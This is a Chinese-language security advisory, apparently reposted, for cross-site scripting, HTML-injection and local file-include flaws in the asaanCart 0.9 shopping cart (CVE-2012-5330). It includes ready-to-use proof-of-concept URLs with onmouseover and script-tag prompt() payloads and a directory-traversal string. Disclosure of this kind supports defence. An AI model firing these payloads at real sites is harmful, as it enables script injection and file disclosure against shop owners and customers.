asaanCart跨站脚本执行漏洞

发布日期:2012-03-14
更新日期:2012-10-10

受影响系统:
sourceforge asaanCart 0.9
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52498
CVE ID: CVE-2012-5330

asaanCart是专为小型业务开发的在线购物车解决方案。

asaanCart 0.9存在多个XSS漏洞,可允许远程攻击者通过PATH_INFO向calc.php、chat.php、 register.php、index.php传参,或page参数向libs/smarty_ajax/index.php传参注入意任意Web脚本或HTML代码。

<*来源:Number 7
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

for the HTML-injection vulnerabilities:
%20v-0.9/libs/smarty_ajax/calc.php/%22onmouseover=prompt(944322)%3E%3Cu%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3EInjection%20Here%3C/big%3E%3C/big%3E%3C/big%3E%3C/big%3E%3C/u%3E
%20v-0.9/libs/smarty_ajax/chat.php/%22onmouseover=prompt(998415)%3E%3CBig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cu%3EHtml%20Injection%20HerE.%3C/u%3E%3C/Big%3E%3C/big%3E%3C/big%3E%3C/big%3E
%20v-0.9/libs/smarty_ajax/register.php/%22onmouseover=prompt(970389)%3E%3Cbig%20style=%22color:%20rgb(204,%200,%200);%22%3E%3Cbig%3E%3Cspanstyle=%22font-weight:%20bold;%20font-style:%20italic;%20text-decoration:%20underline;%22%3EHtmlInjection.%3C/span%3E%3C/big%3E%3C/big%3E
%20v-0.9/libs/smarty_ajax/index.php/%22onmouseover=prompt(970389)%3E%3Cbig%20style=%22color:%20rgb(204,%200,%200);%22%3E%3Cbig%3E%3Cspanstyle=%22font-weight:%20bold;%20font-style:%20italic;%20text-decoration:%20underline;%22%3EHtmlInjection.%3C/span%3E%3C/big%3E%3C/big%3E

for the cross-site scripting vulnerability:
%20v-0.9/libs/smarty_ajax/index.php?_=&amp;f=update_intro&amp;page=1%3CScRiPt%20%3Eprompt%28949136%29%3C%2fScRiPt%3E

for the local file-include vulnerability:
%20v-0.9/libs/smarty_ajax/index.php?_=&amp;f=update_intro&amp;page=../../../../../templates\add_product

建议:
--------------------------------------------------------------------------------
厂商补丁:

sourceforge
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wyxyfz.html